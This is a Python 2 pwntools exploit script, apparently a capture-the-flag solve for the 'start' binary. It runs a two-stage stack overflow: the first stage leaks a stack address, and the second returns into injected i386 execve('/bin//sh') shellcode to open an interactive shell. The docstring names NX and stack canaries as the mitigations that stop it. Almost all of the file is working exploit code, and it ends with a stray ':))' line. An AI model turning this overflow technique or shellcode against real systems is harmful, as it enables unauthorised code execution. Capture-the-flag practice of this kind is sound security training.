"""Two-stage stack-overflow solve for the local ./start binary (Python 2, pwntools).

Stage 1 overwrites a saved return address so that the process sends data back;
the first four bytes of that reply are interpreted as a stack pointer.
Stage 2 overflows the same buffer again and returns into bytes that the
payload itself placed on the stack.

Defensive reading: stage 2 only succeeds when the stack is executable and
nothing (such as a stack canary) sits between the buffer and the saved return
address. A non-executable stack (NX/DEP) and compiler stack protectors are
therefore the mitigations to verify on a binary that fails this way.
"""
from pwn import *

# Both stages put 20 filler bytes in front of the 4-byte return-address slot.
PAD_LEN = 20

# Address inside the binary used as the first return target.
# NOTE(review): presumably re-enters the program's output path so that stack
# contents are written back to the client; confirm against a disassembly.
LEAK_TARGET = 0x08048087

# 32-bit x86 bytes: push "/bin//sh", point ebx at it, then int 0x80 with
# al = 0x0b (the execve syscall number on i386 Linux).
SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

# Four xor reg,reg instructions clearing eax, ebx, ecx and edx before SHELLCODE.
CLEAR_REGS = "\x31\xC0\x31\xDB\x31\xC9\x31\xD2"

io = process("./start")
# io = remote("chall.pwnable.tw", 10000)

# Loaded as in the original but never referenced afterwards; pwntools logs the
# binary's mitigation summary (checksec) when an ELF is opened.
binary = ELF("./start")

print(io.recvuntil("Let's start the CTF:"))

# Stage 1: redirect execution to LEAK_TARGET and read back a stack address.
io.send("A" * PAD_LEN + p32(LEAK_TARGET))
leaked_sp = u32(io.recv(4))
print("stack address : %s" % str(hex(leaked_sp)))

# Stage 2: the new return address is the leaked pointer plus 0x14.
# NOTE(review): presumably this offset makes the return land on CLEAR_REGS,
# which directly follows the 4-byte address in this payload; confirm in a debugger.
stage2 = "B" * PAD_LEN + p32(leaked_sp + 0x14) + CLEAR_REGS + SHELLCODE
io.send(stage2)

print(io.recv(1024))
io.interactive()
:))